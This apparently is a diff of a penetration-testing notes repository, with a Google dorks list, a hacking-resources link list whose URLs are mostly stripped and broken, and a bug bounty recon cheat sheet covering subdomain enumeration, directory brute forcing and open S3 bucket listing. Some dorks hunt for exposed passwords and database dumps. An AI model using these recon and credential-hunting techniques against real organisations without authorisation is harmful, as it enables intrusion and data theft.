     359 + 
     360 +Socat Port Forward
     361 + 
     362 +```
     363 +./socat tcp-listen:5000,reuseaddr,fork tcp:<target ip>:5001
     364 +```
     365 + 
  • cheat-sheets/
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
     1 +# Google Dorks
     2 + 
     3 +Title: Google Dorks for Targeted Information Search
     4 + 
     5 +People and Accounts:
     6 + 
     7 +1. Search for emails based on a username:
     8 + 
     9 + ```
     10 + "username*com"
     11 + ```
     12 +2. Search for online resumes of a person:
     13 + 
     14 + ```
     15 + inurl:resume "john smith"
     16 + intext:resume "john smith"
     17 + ```
     18 +3. Search for people with a specific job title and location on LinkedIn:
     19 + 
     20 + ```
     21 + site: "<job title>" ( OR ☏ OR ✆ OR
     22 + ```
     23 +4. Find people within GitHub code:
     24 + 
     25 + ```
     26 + site:*/people
     27 + ```
     28 +5. Search for lists of attendees or finalists:
     29 + 
     30 + ```
     31 + intitle:final.attendee.list OR inurl:final.attendee.list
     32 + ```
     33 +6. Search for login information on exposed Trello boards:
     34 + 
     35 + ```
     36 + site: password + admin OR username
     37 + ```
     38 + 
     39 +Documents:
     40 + 
     41 +1. Search for specific documents within a domain in PDF format:
     42 + 
     43 + ```
     44 + site:<domain> filetype:PDF
     45 + ```
     46 +2. Search for PDF documents containing possible email information within a specific domain:
     47 + 
     48 + ```
     49 + filetype:pdf <domain> "email"
     50 + ```
     51 +3. Search for XLS files within government websites:
     52 + 
     53 + ```
     54 + filetype:xls
     55 + ```
     56 + 
     57 +Cloud, Buckets, and Databases:
     58 + 
     59 +1. Search for confidential or top-secret documents within open Amazon S3 buckets:
     60 + 
     61 + ```
     62 + site: confidential OR "top secret"
     63 + ```
     64 +2. Search for confidential login information within XLS files on Amazon buckets:
     65 + 
     66 + ```
     67 + s3 site: filetype:xls password
     68 + ```
     69 +3. Search for copies of databases:
     70 + 
     71 + ```
     72 + ext:sql intext:"-- phpMyAdmin SQL Dump"
     73 + ```
     74 + 
     75 +Social Media:
     76 + 
     77 +1. Search for a specific tweet shared on other media, excluding Twitter:
     78 + 
     79 + ```
     80 + "text of a tweet" -site:
     81 + ```
     82 +2. Search for links or information related to a specific username not coming directly from their Twitter timeline:
     83 + 
     84 + ```
     85 + @dutch_osintguy
     86 + ```
     87 + 
     88 +Please note that these Google Dorks are intended for authorized purposes and should be used responsibly.
     89 + 
  • ■ ■ ■ ■ ■ ■
     1 +# Hacking Resources
     2 + 
     3 +* [Hacking Resources](broken-reference)
     4 + * [Usefull Web Browser plugins](broken-reference)
     5 + * [Cool Tools/Labs](broken-reference)
     6 + * [Linux Privilege Escalation](broken-reference)
     7 + * [Windows Privilege Escalation](broken-reference)
     8 + * [Windows stuff](broken-reference)
     9 + * [Powershell](broken-reference)
     10 + * [Linux stuff](broken-reference)
     11 + * [Pivoting](broken-reference)
     12 + * [Brute force/Cracking](broken-reference)
     13 + * [Red Team](broken-reference)
     14 + * [Exploit Development/Reversing/AV|EDR Bypass/Malware Analysis](broken-reference)
     15 + * [Compiling exploits](broken-reference)
     16 + * [Obfuscators](broken-reference)
     17 + * [Deobfuscators](broken-reference)
     18 + * [Buffer Overflows](broken-reference)
     19 + * [General Hacking Cheatsheets/Cool Articles/Podcasts](broken-reference)
     20 + * [Cobalt Strike](broken-reference)
     21 + * [Bug Bounty/Web Security](broken-reference)
     22 + * [Subdomain finders](broken-reference)
     23 + * [Subdomain takeover](broken-reference)
     24 + * [Discovering of Target by using ASN (IP Blocks) and reverse whois](broken-reference)
     25 + * [Screenshotting](broken-reference)
     26 + * [Cool presentations/videos](broken-reference)
     27 + * [Cool Books](broken-reference)
     28 + * [Infosec twitter accounts to follow (it’s a really awesome way to learn as well!. Will keep adding them)](broken-reference)
     29 + 
     30 +### Hacking Resources <a href="#hacking-resources" id="hacking-resources"></a>
     31 + 
     32 +This isn’t more than another hacking resources list. I basically throw here every resource I get interested on taking a look/playing with it, or stuff that I use as a reference while trying to break something.
     33 + 
     34 +**Usefull Web Browser plugins**
     35 + 
     36 +* [](
     37 +* []( **<—— For Firefox**
     38 +* []( **<—— For Chrome**
     39 +* [](
     40 +* [](
     41 + 
     42 +**Cool Tools/Labs**
     43 + 
     44 +* [](
     45 +* [](
     46 +* [](
     47 +* [](
     48 +* [](
     49 +* [](
     50 +* [](
     51 +* [](
     52 +* [](
     53 +* [](
     54 +* [](
     55 +* [](
     56 +* [](
     57 +* [](
     58 +* [](
     59 +* [](
     60 +* [](
     61 +* [](
     62 + 
     63 +**Linux Privilege Escalation**
     64 + 
     65 +* [](
     66 +* [](
     67 +* [](
     68 +* [](
     69 +* [\~aeb/linux/hh/hh-8.html](\~aeb/linux/hh/hh-8.html)
     70 +* [](
     71 +* [\_managers\_privesc/](\_managers\_privesc/)
     72 + 
     73 +**Windows Privilege Escalation**
     74 + 
     75 +* [](
     76 +* [](
     77 +* [](
     78 +* []( **<—— Eternal blue without MSF**
     79 +* [](
     80 +* [\_escalation\_windows.html](\_escalation\_windows.html)
     81 +* [](
     82 +* [](
     83 + 
     84 +**Windows stuff**
     85 + 
     86 +* [\_folders\_quickref.pdf](\_folders\_quickref.pdf)
     87 +* [](
     88 +* [](
     89 +* [](
     90 +* [](
     91 +* [](
     92 +* []( **<— DotNetNuke (CVE-2017-9822) Payloads**
     93 + 
     94 +**Powershell**
     95 + 
     96 +* []( **<—— Serie about Poershell for Penetration Testing (5 posts)**
     97 + 
     98 +**Linux stuff**
     99 + 
     100 +* [](
     101 +* [](
     102 +* [](
     103 + 
     104 +**Pivoting**
     105 + 
     106 +* [](
     107 +* [](
     108 +* [](
     109 + 
     110 +**Brute force/Cracking**
     111 + 
     112 +* []( **<—— Distributed hash-cracking platform on serverless AWS componentes**
     113 +* [\_hashes](\_hashes)
     114 +* [](
     115 +* [](
     116 +* [](
     117 + 
     118 +**Red Team**
     119 + 
     120 +* []( **<– Resource Based Constrained Delegation IN LINUX**
     121 +* [](
     122 +* [](
     123 +* [](
     124 +* [](
     125 +* []( \*\*<—— Awesome Active Directory Posts \*\*
     126 +* []( **<—— Serie about Kerberoasting (5 posts)**
     127 +* [](
     128 +* []( **<– Abuse Constrained Delegation**
     129 +* [](
     130 + 
     131 +**Exploit Development/Reversing/AV|EDR Bypass/Malware Analysis**
     132 + 
     133 +* [](
     134 +* []( **<—- Automatic generation of some AMSI Bypass**
     135 +* [](
     136 +* [](
     137 +* [\_F21.shtml](\_F21.shtml) **<— Practical Malware Analysis Course!**
     138 +* [](
     139 +* [](
     140 +* [](
     141 +* [](
     142 +* [\_update.pdf](\_update.pdf)
     143 +* [](
     144 +* [](
     145 +* [\_with\_an\_edr/](\_with\_an\_edr/)
     146 +* [](
     147 +* []( **<—– NON documented API’s, possible AV/EDR Bypass?**
     148 +* [\_development\_part\_1/](\_development\_part\_1/) **<—- Malware Devlopment series**
     149 +* [](
     150 +* [](
     151 +* [](
     152 +* [](
     153 +* []( **<— APC Bypass**
     154 +* []( **<—— Documented APIs for Bypass**
     155 +* [](
     156 +* []( **–> ReflectiveDLLInjection en Powershell!!!!**
     157 +* []( **–> Invoke-ReflectivePEInjection Powershell**
     158 +* [](
     159 +* [\_05\_13\_archive.html](\_05\_13\_archive.html)
     160 + 
     161 +**Compiling exploits**
     162 + 
     163 +* [](
     164 +* [](
     165 +* [](
     166 + 
     167 +**Obfuscators**
     168 + 
     169 +* [](
     170 +* [](
     171 + 
     172 +**Deobfuscators**
     173 + 
     174 +* [](
     175 +* [](
     176 +* [](
     177 +* [](
     178 + 
     179 +**Buffer Overflows**
     180 + 
     181 +* [](
     182 +* [](
     183 +* [,51/](,51/)
     184 +* [](
     185 +* [](
     186 + 
     187 +**General Hacking Cheatsheets/Cool Articles/Podcasts**
     188 + 
     189 +* []( **<—- OSEP Code Snippets!**
     190 +* [](
     191 +* [](
     192 +* [](
     193 +* [](
     194 +* [](
     195 +* [](
     196 +* [](
     197 +* [](
     198 +* [](
     199 +* [](
     200 +* [](
     201 +* [\_Journey\_to\_Try\_Harder-\_TJNulls\_Preparation\_Guide\_for\_PWK\_OSCP.html](\_Journey\_to\_Try\_Harder-\_TJNulls\_Preparation\_Guide\_for\_PWK\_OSCP.html)
     202 +* [](
     203 +* [](
     204 +* [](
     205 +* [](
     206 +* [](
     207 + 
     208 +**Cobalt Strike**
     209 + 
     210 +* [](
     211 + 
     212 +**Bug Bounty/Web Security**
     213 + 
     214 +* [](
     215 +* [](
     216 +* [](
     217 +* [](
     218 +* [](
     219 +* [](
     220 +* [\_8](\_8)
     221 +* [](
     222 +* [](
     223 +* [](
     224 +* [](
     225 +* [](
     226 +* [\_to\_become\_a\_bug\_bounty\_hunter/](\_to\_become\_a\_bug\_bounty\_hunter/)
     227 +* [](
     228 +* []( \*\*<—— Serie of 3 post about Bug Hunting Methodology \*\*
     229 +* [](
     230 +* [](
     231 +* []( \*\*<—— Tweet by @FaniMalikHack with an infographic about JWT \*\*
     232 + 
     233 +**Subdomain finders**
     234 + 
     235 +* [](
     236 +* [](
     237 +* [](
     238 +* [](
     239 +* [](
     240 +* [](
     241 +* [](
     242 +* []( \*\*<—— Discovering searching by acquisitions \*\*
     243 + 
     244 +**Subdomain takeover**
     245 + 
     246 +* [](
     247 +* [](
     248 + 
     249 +**Discovering of Target by using ASN (IP Blocks) and reverse whois**
     250 + 
     251 +* [](
     252 +* [](
     253 +* [](
     254 +* [](
     255 +* [](
     256 + 
     257 +**Screenshotting**
     258 + 
     259 +* [](
     260 +* [](
     261 +* [](
     262 +* [](
     263 + 
     264 +**Cool presentations/videos**
     265 + 
     266 +* Defeating EDRs using Dynamic Invocation - Jean Francois Maes [](
     267 +* A New Era Of SSRF: Exploiting Url Parsrs - Orange Tsai [](
     268 +* HTTP Desync Attacks: Smashing into the Cell Next Door - albinowax [\&t=1622s](\&t=1622s)
     269 +* A $7.500 BUG BOUNTY Bug Explained, step by step. (Blind XXE OOB over DNS) - STOK [\&t=26s\&pbjreload=101](\&t=26s\&pbjreload=101)
     270 +* GitHub Recon and Sensitive Data Exposure [\_59fQ](\_59fQ)
     271 +* Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface [](
     272 +* How to Crush Bug Bounties in the first 12 Months [](
     273 +* The Bug Hunter’s Methodology v4.0 - Recon Edition by @jhaddix​ at #NahamCon2020​ [](
     274 +* How i became a HackerOne MVH without writing a single line of python (Motivational talk) by STOK [](
     275 +* My Journey to Cybersecurity CIA Keynote - Heath Adams (aka The Cyber Mentor) [](
     276 +* Defeating EDR’s using D/Invoke - Jean-François Maes - [\_Z\_WV9fp9Q](\_Z\_WV9fp9Q)
     277 + 
     278 +**Cool Books**
     279 + 
     280 +* [](
     281 +* [](
     282 +* [](
     283 + 
     284 +**Infosec twitter accounts to follow (it’s a really awesome way to learn as well!. Will keep adding them)**
     285 + 
     286 +* securibee: [](
     287 +* codingo\_: [](\_
     288 +* hakluke: [](
     289 +* JackRhysider: [](
     290 +* Orange Tsai: [\_8361](\_8361)
     291 +* MalwareTech: [](
     292 +* TomTomNom: [](
     293 +* Jason Haddix: [](
     294 +* NahamSec: [](
     295 +* STOK: [](
     296 +* John Hammond: [\_johnhammond](\_johnhammond)
     297 +* Jake Williams: [](
     298 +* Deviant Ollman: [](
     299 +* J3rryBl4nks: [](
     300 +* Tib3rius: [](
     301 +* TheColonial: [](
     302 +* Rob Fuller: [](
     303 +* g0tmi1k: [](
     304 +* TJ\_Null: [\_Null](\_Null)
     305 +* Rasta Mouse: [\_RastaMouse](\_RastaMouse)
     306 +* ippsec: [](
     307 +* Chema Alonso: [](
     308 +* FalconSpy: [](
     309 +* Minh: [](
     310 +* 0verfl0w: [](\_
     311 +* Markus Höfer: [](
     312 +* Jonas L: [](
     313 +* Will Dormann: [](
     314 +* Scott Piper: [](
     315 + 
  • ■ ■ ■ ■ ■ ■
    1  -# Page 1
    2  - 
    3  - 
  • ■ ■ ■ ■ ■ ■
    1  -# Bug Bounty Cheatsheet
    2  - 
    3  -#### &#x20;<a href="#random-dns-pic" id="random-dns-pic"></a>
    4  - 
    5  -#### Burp Regex for Scope Control
    6  - 
    7  -```regex
    8  -.*\.domain\.com$
    9  -```
    10  - 
    11  -Explanation: This regular expression is used in Burp Suite to control the scope of the target by matching subdomains of the `` domain. It is commonly used to ensure that only specific subdomains are included in the testing scope.
    12  - 
    13  -Title: Pull Root Subdomains from Final.txt
    14  - 
    15  -```bash
    16  -cat final | rev | cut -d . -f 1-3 | rev | sort -u | tee root.subdomains
    17  -```
    18  - 
    19  -Explanation: This command is used to extract the root subdomains from a file called `final.txt`. It performs several operations using common command-line tools (`cat`, `rev`, `cut`, `sort`) to manipulate the subdomains and then stores the unique root subdomains in a file called `root.subdomains`.
    20  - 
    21  -Title: Port Scanning IP Ranges
    22  - 
    23  -Explanation: This section provides tips for conducting port scanning on IP ranges. It suggests using tools like Basic Shodan, Google Dorks, and ASN lookups to find target CIDR ranges. It also recommends importing the scan results into a tool called IVRE for a comprehensive overview of the scanned IP addresses.
    24  - 
    25  -Small Tips:
    26  - 
    27  -1. It is recommended to run the port scanning on a virtual private server (VPS) like
    28  -2. Running the scan inside a screen session (`screen -SmL`) allows it to continue running even after disconnecting from the server.
    29  -3. Piping the output using `tee` allows saving the results to a file while still displaying them on the terminal.
    30  - 
    31  -Note: While some people suggest using masscan for faster scanning, the author finds that using a VPS along with nMap and Screen provides more reliable results, even though it may be slower.
    32  - 
    33  -Sn1per
    34  - 
    35  -Sn1per is an automated reconnaissance scanner designed for penetration testing and bug bounty hunting. It combines various tools and techniques to gather information and identify potential vulnerabilities in target systems.
    36  - 
    37  -How to use Sn1per:
    38  - 
    39  -1. Clone the Sn1per repository from GitHub:
    40  - 
    41  -```shell
    42  -git clone
    43  -```
    44  - 
    45  -2. Navigate to the Sn1per directory:
    46  - 
    47  -```shell
    48  -cd Sn1per
    49  -```
    50  - 
    51  -3. Run the installation script to set up the required dependencies:
    52  - 
    53  -```shell
    54  -./
    55  -```
    56  - 
    57  -4. Once the installation is complete, you can start using Sn1per by running the following command:
    58  - 
    59  -```shell
    60  -./sn1per
    61  -```
    62  - 
    63  -By default, Sn1per runs in a wizard mode that guides you through the scanning process. It prompts you to enter the target URL or IP address, selects the scanning modules, and provides options for customization.
    64  - 
    65  -You can also use command-line arguments to specify the target and customize the scanning process. For example:
    66  - 
    67  -```shell
    68  -./sn1per -t -m all -o output.txt
    69  -```
    70  - 
    71  -This command scans the target domain "" using all available modules and saves the output to "output.txt".
    72  - 
    73  -Sn1per provides a wide range of scanning modules, including port scanning, subdomain enumeration, vulnerability scanning, and more. You can explore the documentation and usage guide in the Sn1per repository to learn about all the available options and advanced features.
    74  - 
    75  -Remember to use Sn1per responsibly and ethically, respecting the rules and guidelines of your engagements or bug bounty programs.
    76  - 
    77  -Subdomain Enumeration Techniques
    78  - 
    79  -Example:
    80  - 
    81  -Subdomain enumeration is an essential phase in reconnaissance for bug bounty hunting and penetration testing. It helps identify subdomains associated with a target domain, which can often reveal potential attack vectors or misconfigurations. Here are a few techniques and tools commonly used for subdomain enumeration:
    82  - 
    83  -1. Basic Enumeration with Subfinder: Subfinder is a versatile subdomain enumeration tool. It leverages various sources to discover subdomains associated with a target domain. Make sure to populate all API keys for optimal results, including a Shodan Pro account if available. To use Subfinder, execute the following command:
    84  - 
    85  - ```
    86  - subfinder -d -o outfile.txt
    87  - ```
    88  - 
    89  -`Rapid7 FDNS`: Rapid7 provides a comprehensive dataset called Sonar FDNS, which contains DNS-related information. This dataset can be used for subdomain enumeration. To utilize it, follow these steps:
    90  - 
    91  -* Install the necessary dependencies by running:
    92  - 
    93  - ```
    94  - aptitude install jq pigz
    95  - ```
    96  -* Download the Sonar FDNS dataset in JSON format:
    97  - 
    98  - ```
    99  - wget
    100  - ```
    101  -* Extract the data and filter subdomains of interest. For example:
    102  - 
    103  - ```
    104  - cat 20170417-fdns.json.gz | pigz -dc | grep "" | jq
    105  - ```
    106  - 
    107  -`Rapid7 FDNS` (Part 2): Similar to the previous technique, you can download and process the Rapid7 FDNS dataset for subdomain enumeration. Here are the steps:
    108  - 
    109  -* Download the desired FDNS dataset:
    110  - 
    111  - ```
    112  - wget
    113  - ```
    114  -* Extract the data and filter subdomains based on your criteria. For example:
    115  - 
    116  - ```
    117  - 2019-11-29-1574985929-fdns_a.json.gz | pigz -dc | grep "" | jq
    118  - ```
    119  - 
    120  -`Rapid7 FDNS` (Part 3 with DNSGrep): The DNSGrep tool, based on Rapid7 Sonar DNS data, can help in subdomain enumeration. Please refer to the GitHub repository for more details and usage instructions:
    121  - 
    122  -`Assetfinder` by Tomnomnom: Assetfinder, developed by Tomnomnom, is a powerful tool for subdomain enumeration. It utilizes various sources to discover subdomains associated with the target domain. To use Assetfinder, execute the following command:
    123  - 
    124  -```
    125  -go get -u
    126  -assetfinder
    127  -```
    128  - 
    129  -Remember to respect the terms of service and usage policies of the respective tools and data sources. Subdomain enumeration should always be performed within the scope of authorized engagements or bug bounty programs.
    130  - 
    131  - 
    132  - 
    133  -**Chaos - Project Discovery**
    134  - 
    135  -```
    136  -- Requires a BETA Tester Key to function
    137  - 
    138  -chaos -d
    139  -```
    140  - 
    141  -**Findomain**
    142  - 
    143  -```
    144  -#
    145  - 
    146  -Awesome little tool that can sometimes find domains amass cant - Also very quick as its built with rust :)
    147  - 
    148  -** Marked below require API Keys to work
    149  - 
    150  -Certspotter
    152  -Virustotal
    153  -Sublist3r
    154  -Facebook **
    155  -Spyse (CertDB) *
    156  -Bufferover
    157  -Threadcrow
    158  -Virustotal with apikey **
    159  - 
    160  -findomain -t
    161  - 
    162  -```
    163  - 
    164  -**Reverse WHOIS Search**
    165  - 
    166  -```
    167  -#
    168  - 
    169  -Search Org name above to find all WHOIS Records with this Organisation listed.
    170  - 
    171  -For Ex. Oath Inc returns 10k subdomains
    172  - 
    173  -Take subdomains pipe them through assetfinder or amass again /
    174  - 
    175  -```
    176  - 
    177  -**WaybackURLs - Fetch all URL’s that WayBackMachine Knows About a Domain**
    178  - 
    179  -```
    180  -#
    181  - 
    182  - 
    183  -cat subdomains | waybackurls > urls
    184  -```
    185  - 
    186  -****
    187  - 
    188  -```
    189  -Numerous repos & large dumps from various sources of Scans.
    190  - 
    191  -
    192  -```
    193  - 
    194  -**Assets-From-SPF / Pull Domains from SPF Records**
    195  - 
    196  -```
    197  -
    198  - 
    199  -$ python --help
    200  -Usage: [OPTIONS] DOMAIN
    201  - 
    202  -Options:
    203  - --asn / --no-asn Enable/Disable ASN enumeration
    204  - --help Show this message and exit.
    205  -```
    206  - 
    207  -**GitHub SubDomain Scrap**
    208  - 
    209  -```
    210  -
    211  - 
    212  -As we have saw from various bug reports in the past, sometimes developers will leave API keys and SSH keys etc in public repos however the same principle applies for developers hard coding hidden endpoints or domains in the source code.
    213  - 
    214  -We can use to scrape for domains from public repos with the below syntax :)
    215  - 
    216  - 
    217  -python3 $Tools/ -d -t
    218  -```
    219  - 
    220  -**Generate Basic Permutations**
    221  - 
    222  -```
    223  -I have a small bash loop to handle this
    224  - 
    225  -#!/bin/bash
    226  -for i in $(cat /home/aidan/Tools/alterations.txt); do echo $i.$1;
    227  -done;
    228  -```
    229  - 
    230  -**Reverse DNS Lookups on List of IP’s**
    231  - 
    232  -```
    233  -#
    234  - 
    235  -Sometimes you may have a IP list of targets instead of domains, perhaps from ASN lookup. Here we can use a quick little tool called hakrevdns to carry out numerous reverse DNS lookups.
    236  - 
    237  -hakluke~$ prips | hakrevdns
    238  -
    239  -
    240  -
    241  -
    242  -
    243  -
    244  -
    245  -
    246  -
    247  -
    248  -
    249  -
    250  -
    251  -```
    252  - 
    253  -**AMass Basic Active Scan**
    254  - 
    255  -```
    256  -You could do with a amass passive scan and not resolve domains with MassDNS later but I usually just go with active :)
    257  - 
    258  -amass enum -d,
    259  -```
    260  - 
    261  -**Certificate Transparency Logs**
    262  - 
    263  -```
    264  -python3 $BugBounty
    265  - 
    266  -This script be found in my GitHub repo, it just takes a domain and passes it to and aggerates the output.
    267  -```
    268  - 
    269  -**Subdomain Brute Force (Subbrute & MassDNS)**
    270  - 
    271  -```
    272  -$Tools/ $Tools/massdns/lists/names.txt | massdns -r $Tools/massdns/lists/resolvers.txt -t A -a -o -w massdns_output.txt -
    273  -```
    274  - 
    275  -**Generate Permutations with AltDNS**
    276  - 
    277  -```
    278  -altdns -i input_domains.txt -o permutationoutput.txt -w $Tools/altdns/words.txt -r -s resolved_output.txt
    279  - 
    280  -This may take a while to run but should always be part of your recon process no matter how little results it yields.
    281  -```
    282  - 
    283  -**Generate Permutations with dnsGen (Overall Best Way)**
    284  - 
    285  -```
    286  -#
    287  - 
    288  -git clone
    289  -cd dnsgen
    290  -pip3 install -r requirements.txt
    291  -python3 install
    292  - 
    293  -cat domains.txt | dnsgen - | massdns -r /path/to/resolvers.txt -t A -o J --flush 2>/dev/null
    294  -```
    295  - 
    296  -**Find Resolvable Domains with MassDNS**
    297  - 
    298  -```
    299  -massdns -r $Tools/massdns/lists/resolvers.txt -t A -o S allsubdomains.txt -w livesubdomains.messy
    300  - 
    301  -sed 's/A.*//' livesubdomains.messy | sed 's/CN.*//' | sed 's/\..$//' > domains.resolved
    302  -```
    303  - 
    304  -**Find HTTP/HTTPS Servers with HTTProbe**
    305  - 
    306  -```
    307  -cat domains.resolved | httprobe -c 50 -p 8080,8081,8089 | tee http.servers
    308  - 
    309  - 
    310  -the -p flag adds these ports to the scan, will increase time but good for finding secondary http services on non standard ports (80,443)
    311  -```
    312  - 
    313  -**Find HTTP/HTTPS Servers with nMap and Filtering**
    314  - 
    315  -```
    316  - 
    317  -sudo nmap -sS -p 80,443 -iL List.txt -oA m0chan.xml
    318  - 
    319  -import xmltree
    320  -def removeHostname():
    321  - for host in root.iter('host'):
    322  - for elem in host.iter():
    323  - if 'name' in elem.attrib and elem.attrib['name'] == 'ISP_redir_site':
    324  - root.remove(host)
    325  -tree.write('output.xml')
    326  -```
    327  - 
    328  -**Pass HTTProbe Results to EyeWitness**
    329  - 
    330  -```
    331  -cp http.servers $Tools
    332  -$Tools/EyeWitness/ --web -f http.servers
    333  -```
    334  - 
    335  -**Pass All Subdomains too S3 Scanner**
    336  - 
    337  -```
    338  -Even if a subdomain does not follow normal bucket naming conventtion it may be resolving to an unsecured one.
    339  - 
    340  -Therefore run the following
    341  - 
    342  -python $Tools/S3Scanner/ -l domains.resolved -o buckets.txt
    343  - 
    344  --d flag will dump all open buckets locally
    345  - 
    346  -If you find open buckets you can run the useful bash look to enumerate content
    347  - 
    348  -for i in $(cat buckets.txt); do aws s3 ls s3://$i; done;
    349  - 
    350  -This will require basic auth key/secret which you can get for free from AWS
    351  -```
    352  - 
    353  -**Finding CNames for all Domains**
    354  - 
    355  -```
    356  -massdns -r massdns/lists/resolvers.txt -t CNAME -o S -w paypal.massdns.cnames paypal.subdomains
    357  - 
    358  -cat paypal.subdomains | grep trafficmanager
    359  -cat paypal.subdomains | grep azure
    360  -```
    361  - 
    362  -**Subdomain Bruteforcing with all.txt**
    363  - 
    364  -```
    365  -#
    366  - 
    367  -todo - As there is a few methods to talk about here but the best wordlists is Jason Haddix's all.txt
    368  - 
    369  -dnsrecon -d -D all.txt -t brt
    370  - 
    371  -#Fastest is Probably
    372  -python $Tools/subbrute/ -t all.txt
    373  - 
    374  - 
    375  -#Final method is using GoBuster which is also v fast
    376  -gobuster dns -d -w all.txt
    377  -```
    378  - 
    379  -**Subdomain Bruteforcing with Commonspeak Wordlists**
    380  - 
    381  -```
    382  -#
    383  -#
    384  - 
    385  -Common speak from Assetnote has a unique way of generating wordlists and
    386  -one of my favorite wordlists to use for subdomain brute forcing. There are
    387  -numerous datasets on Google Big query that are constantly being updated with
    388  -new information. These datasets are used by common speak to create a wordlist
    389  -that contain current technologies and terminology.
    390  - 
    391  -dnsrecon -d -D commonspeak.txt -t brt
    392  - 
    393  - 
    394  -#Fastest is Probably
    395  -python $Tools/subbrute/ -t commonspeak.txt
    396  - 
    397  -#Final method is using GoBuster which is also v fast
    398  -gobuster dns -d -w commonspeak.txt
    399  -```
    400  - 
    401  -**Fuzzing Subdomains with WFuzz**
    402  - 
    403  -```
    404  -wfuzz -c -f re -w /SecLists/Discovery/DNS/subdomains-top1mil-5000.txt -u "http://domain.htb" -H "Host: FUZZ.domain.htb" --hh 311\
    405  -```
    406  - 
    407  -#### ASN Enumeration
    408  - 
    409  -I wasn’t sure if I should add this under **Subdomain Enumeration** but doesn’t really matter. Here are a few techniques to discover subdomains and ports via companies publicly available ASN numbers.
    410  - 
    411  -**Reverse WHOIS on Company Name with Whoxy**
    412  - 
    413  -```
    414  -#Requires a paid API key, but well worth the money :)
    415  - 
    416  -curl ",+Inc." | jq -r '.search_result[].domain_name'
    417  - 
    418  -```
    419  - 
    420  -**ASNLookup**
    421  - 
    422  -```
    423  -#
    424  - 
    425  -python -o <Organization>`
    426  -```
    427  - 
    428  -**Find Organistations ASN’s**
    429  - 
    430  -```
    431  -amass intel -org paypal
    432  -1449, PAYPAL-CORP - PayPal
    433  -17012, PAYPAL - PayPal
    434  -26444, PAYDIANT - PayPal
    435  -59065, PAYPALCN PayPal Network Information Services (Shanghai) Co.
    436  -206753, PAYPAL-
    437  -```
    438  - 
    439  -**Find IPv4 Address Space from ASN**
    440  - 
    441  -```
    442  -I have yet to find a good tool to do this so I will be writing something in Go very shortly, but in the meantime you can simple visit
    443  - 
    444  -
    445  - 
    446  -
    447  -```
    448  - 
    449  -![](\</img>
    450  - 
    451  -**Parse CIDR from ASN Lookup too AMass Enum**
    452  - 
    453  -```
    454  -amass enum -d -cidr
    455  - 
    456  -I have found to have really good results using `amass enum` here + large CIDR range however sometimes these can be false positives/dead hosts so remember to verifiy with MassDNS if they are live.
    457  -```
    458  - 
    459  -#### Content Discovery
    460  - 
    461  -Here I will discuss some basic tactics once you have a nice list of live subdomains
    462  - 
    463  -**Basic Crawling**
    464  - 
    465  -```
    466  -Crawling a website is typically one of the first places to start once you have discovered the live endpoints. It basically involves recursively visiting and saving each link on a website
    467  - 
    468  -The author of Bug Bounty Playbook created a tool to help with this
    469  - 
    470  -#
    471  - 
    472  -python3 $Tools/crawler/ -d -l 2
    473  - 
    474  - 
    475  -These crawling results can also be combined with the JSearch techniques listed below
    476  -```
    477  - 
    478  -**Commoncrawl One Liner**
    479  - 
    480  -```
    481  -curl -sL | grep 'href="/CC' | awk -F'"' '{print $2}' | xargs -n1 -I{} curl -sL{}-index?url=* | awk -F'"url":\ "' '{print $2}' | cut -d'"' -f1 | sort -u | tee domain.txt
    482  -```
    483  - 
    484  -**Wayback Machine Crawling**
    485  - 
    486  -```
    487  -#
    488  - 
    489  -Sometimes visiting wayback machine and looking up a domain will yield us some awesome results which we can filter for things like .zip, .config and find old endpoints that are technically still live. s
    490  - 
    491  -We can then use this data to find vulns,
    492  - 
    493  -Quote from Bug Bounty Playbook
    494  - 
    495  -"For instance, if you see the path “” you can test for open redirects and SSRF vulnerabilities. If you see the GET parameter “msg=” you can test for XSS. The list can go on for days."
    496  - 
    497  -You can do this manually on the site or using the script linked above
    498  - 
    499  -python3 $Tools/waybackMachine/
    500  -```
    501  - 
    502  -**Common Crawl Data**
    503  - 
    504  -```
    505  -#
    506  - 
    507  -Just like The Wayback Machine Common Crawl also regularly crawls the internet for endpoints. Also, like the Wayback Machine this data is publicly available and we can use it to get a list of endpoints on a site passively.
    508  - 
    509  -python3 $Tools/commoncrawl/ -d
    510  -```
    511  - 
    512  -**Find Easy Wins with DirSearch**
    513  - 
    514  -```
    515  -Of course if we have a large amount ot subs we can't just send over directory-list-2.3medium so I typically use this small list against all the subdomains and (or) ip ranges from ASN lookups.
    516  - 
    517  -/phpinfo.php
    518  -/info.php
    519  -/admin.php
    520  -/api/apidocs
    521  -/apidocs
    522  -/api
    523  -/api/v2
    524  -/api/v1
    525  -/v2
    526  -/package.json
    527  -/security.txt
    528  -/application.wadl
    529  -/api/apidocs
    530  -/swagger
    531  -/swagger-ui
    532  -/swagger-ui.html
    533  -/swagger/swagger-ui.html
    534  -/api/swagger-ui.html
    535  -/v1.x/swagger-ui.html
    536  -/swagger/index.html
    537  -/graphql
    538  -/graphiql
    539  - 
    540  -python3 -L http.servers -e .* -w paths --simple-report=dirsearch.paypal -t 50
    541  - 
    542  -Be careful with the -t flag, I am using a pretty beefy VPS for this stage :)
    543  -```
    544  - 
    545  -**dirSearching with RobotsDisallowed1000.txt**
    546  - 
    547  -```
    548  -This is similar to the previous method but we are using a Wordlist supplied with SecLists that details the top 1000 entries inside Robots.txt
    549  - 
    550  -
    551  - 
    552  -This usually dosent take too long but can be depending on the scope.
    553  - 
    554  -Tip: Run this on a VPS
    555  - 
    556  -I have had some nice success with raft-large-files.php
    557  - 
    558  -python3 -L http.servers -e .* -w RobotsDisallowed-Top1000.txt --simple-report=dirsearch.paypal -t 50
    559  - 
    560  -Be careful with the -t flag, I am using a pretty beefy VPS for this stage :)
    561  -```
    562  - 
    563  -**Excessive DirSearching with RAFT**
    564  - 
    565  -```
    566  -This may take a very long time to run and timeout depending on your scope but these lists are the goto when it comes to dirbusting
    567  - 
    568  -Tip: Run this on a VPS
    569  - 
    570  -
    571  - 
    572  -
    573  - 
    574  -I have had some nice success with raft-large-files.php
    575  - 
    576  -python3 -L http.servers -e .* -w wordlist --simple-report=dirsearch.paypal -t 50
    577  - 
    578  -Be careful with the -t flag, I am using a pretty beefy VPS for this stage :)
    579  -```
    580  - 
    581  -**Meg - Find Many Paths for Hosts (Similar to DirSearch)**
    582  - 
    583  -```
    584  -#
    585  - 
    586  -meg --verbose paths http.servers
    587  - 
    588  -This will create a /out folder with results from each web server (use this after httprobe) - Then we can simply start grepping for juicy stuff
    589  - 
    590  -grep -r api
